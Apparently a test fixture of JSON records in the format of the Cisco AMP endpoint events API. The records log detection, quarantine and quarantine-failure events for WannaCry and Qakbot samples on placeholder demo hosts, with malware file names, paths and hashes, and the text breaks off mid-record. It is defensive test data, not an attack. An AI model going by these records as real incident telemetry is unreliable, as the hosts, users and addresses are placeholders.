-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":111000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 